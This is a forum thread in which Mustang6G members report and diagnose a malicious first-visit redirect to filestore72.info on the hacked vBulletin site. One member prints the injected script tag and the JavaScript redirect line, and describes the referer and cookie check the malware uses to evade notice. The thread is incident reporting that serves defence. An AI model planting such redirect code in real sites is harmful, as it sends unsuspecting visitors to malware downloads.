Sponsored

Is Mustang6g Hacked?

DAVECS1

Threads
Reaction score
Vehicle(s)
2017 PP GT Grabber Blue
This is happening to me also, first click on my android phone takes me to the filestore.
Second click is here
Sponsored

..::Ryan::..

Threads
Reaction score
Vehicle(s)
2015 Mustang GT - Magnetic
I've noticed it when I browse to Mustang6G following a link from Facebook. So if I click a link in a Facebook group for Mustang6G, it will redirect to a third-party FileShare.info (I believe). If I click back, and click the link again, it will load Mustang6G fine.

This happens when I click a link from my iPhone or from my laptop. The link got blocked by my proxy, but it is trying to take me to hxxp://filestore72.info/download.php?id=1498c470

(replace x with t)

Sponsored

Spart

Threads
Reaction score
Vehicle(s)
17 GT350
Getting this when I click on a link first time only from Facebook. If I close and click again it works correctly. Happening in Chrome on both my Windows PC and my Android phone.
Screenshot_2017-04-12-00-41-43.jpg

Spart

Threads
Reaction score
Vehicle(s)
17 GT350
I'm pretty sure you guys have a rogue advertiser javascript that's doing this.

Spart

Threads
Reaction score
Vehicle(s)
17 GT350
Did my own debugging and this is 100% on Mustang6G.com's end.

When a particular link loads up for the *first time*, a document.location redirect is being issued. Whatever this is appears to use cookies to detect that you've visited that link before, so it opens the site normally. I assume this is to avoid detection.

So in my debugging, there is this line in the <head>

Code:
<script type="text/javascript" src="http://www.mustang6g.com/forums/misc.php?v=388&amp;js=js"></script>
Which loads this

Code:
document.location='http://filestore72.info/download.php?id=1498c470'
STEPS TO REPRODUCE:

1. Open this link in Incognito mode. Ensure all Incognito windows are closed before doing this: https://www.facebook.com/carbondynamicss/posts/1664507543825429
  2. Click the link
  3. Get redirected

Spart

Threads
Reaction score
Vehicle(s)
17 GT350
[MENTION=1]Jarstang[/MENTION] it's a little disappointing that this isn't fixed. I used to refer people on S550 FB groups to specific forum threads all the time, but now that I know they're just going to see a malicious link if they've never been to the site before, I've had to stop doing that.

Some additional info: I was correct that whatever this is is using cookies to track whether you've been to the site before cookie (which helps to avoid detection/replication by people who visit the site regularly.)

It seems the cookie it keys in on is bblang_id. If you delete this cookie and then visit the site from any external link, you'll get the redirect. It is interesting to me that after you delete this cookie, if you continue to browse the site through internal links, the cookie is not recreated.

So, whatever this is:

1. Is checking HTTP_REFERER
  2. If the HTTP_REFERER isn't internal, embeds the JS www.mustang6g.com/forums/misc.php?v=388&amp;js=js after
  3. Creates the bblang_id cookie

Some more info: https://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info

Whatever this is probably has full database access, and can intercept passwords before they're hashed. So consider your password used on this site to be unsafe to use anywhere else.

Here are some screen shots that should help:
mustang6g-hacked-1.jpg
mustang6g-hacked-2.jpg

Sponsored

N123456

Threads
Reaction score
Vehicle(s)
2015 Gt Premium
[MENTION=1]Jarstang[/MENTION] it's a little disappointing that this isn't fixed. I used to refer people on S550 FB groups to specific forum threads all the time, but now that I know they're just going to see a malicious link if they've never been to the site before, I've had to stop doing that.
I agree. This thread is now 40+ posts in length with multiple people reporting from multiple devices. This is something that should be seriously looked at and resolved quickly.

NvrFinished

Threads
Reaction score
Vehicle(s)
2016 DIB GTPP
Same thing happened to me with my android phone this weekend. I normally access the site via my laptop, but I was on the road to an HPDE and needed to check some emails from M6G. I kept getting the virus link and got frustrated.

Spart

Threads
Reaction score
Vehicle(s)
17 GT350
I think more concerning is the fact that this vBulletin malware probably has access to your site password. Hope you haven't used that same password for anything critical!

Jarstang

Administrator
Staff member
Administrator
Threads
Reaction score
Vehicle(s)
Ford
This is being actively worked on as we speak. Diagnosing and resolving the issue takes lots of trial and error so it may not be quick, and may require some server downtime soon.

The malware does NOT have access to the site or any user's passwords.

I will provide an update when it is fixed.

Jarstang

Administrator
Staff member
Administrator
Threads
Reaction score
Vehicle(s)
Ford
A few fixes have been implemented.

Can everyone please clear your cookies and let me know if you experience any more issues when clicking on forum links.
Sponsored